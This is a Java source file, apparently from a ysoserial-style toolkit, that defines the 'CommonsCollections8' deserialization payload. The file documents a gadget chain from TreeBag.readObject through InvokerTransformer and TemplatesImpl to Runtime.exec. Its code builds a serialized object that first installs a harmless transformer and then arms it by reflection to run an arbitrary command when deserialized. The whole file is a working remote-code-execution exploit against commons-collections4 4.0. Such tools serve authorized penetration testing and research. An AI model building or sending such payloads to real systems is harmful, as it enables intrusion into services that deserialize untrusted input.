package payloads;

import org.apache.commons.collections4.bag.TreeBag;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import payloads.annotation.Authors;
import payloads.annotation.Dependencies;
import util.Gadgets;
import util.PayloadRunner;
import util.Reflections;

/*
Gadget chain:
    org.apache.commons.collections4.bag.TreeBag.readObject
    org.apache.commons.collections4.bag.AbstractMapBag.doReadObject
    java.util.TreeMap.put
    java.util.TreeMap.compare
    org.apache.commons.collections4.comparators.TransformingComparator.compare
    org.apache.commons.collections4.functors.InvokerTransformer.transform
    java.lang.reflect.Method.invoke
    sun.reflect.DelegatingMethodAccessorImpl.invoke
    sun.reflect.NativeMethodAccessorImpl.invoke
    sun.reflect.NativeMethodAccessorImpl.invoke0
    com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer
        ... (TemplatesImpl gadget)
    java.lang.Runtime.exec
*/
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
@Authors({Authors.CCKUAILONG})

public class CommonsCollections8 extends PayloadRunner implements ObjectPayload<TreeBag> {

    public TreeBag getObject(final String command) throws Exception {
        Object templates = Gadgets.createTemplatesImpl(command);

        // setup harmless chain
        final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

        // define the comparator used for sorting
        TransformingComparator comp = new TransformingComparator(transformer);

        // prepare CommonsCollections object entry point
        TreeBag tree = new TreeBag(comp);
        tree.add(templates);

        // arm transformer
        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

        return tree;
    }

    public static byte[] getBytes(final String command, Boolean fusion) throws Exception {
        return PayloadRunner.run(CommonsCollections8.class, command, fusion);
    }
}
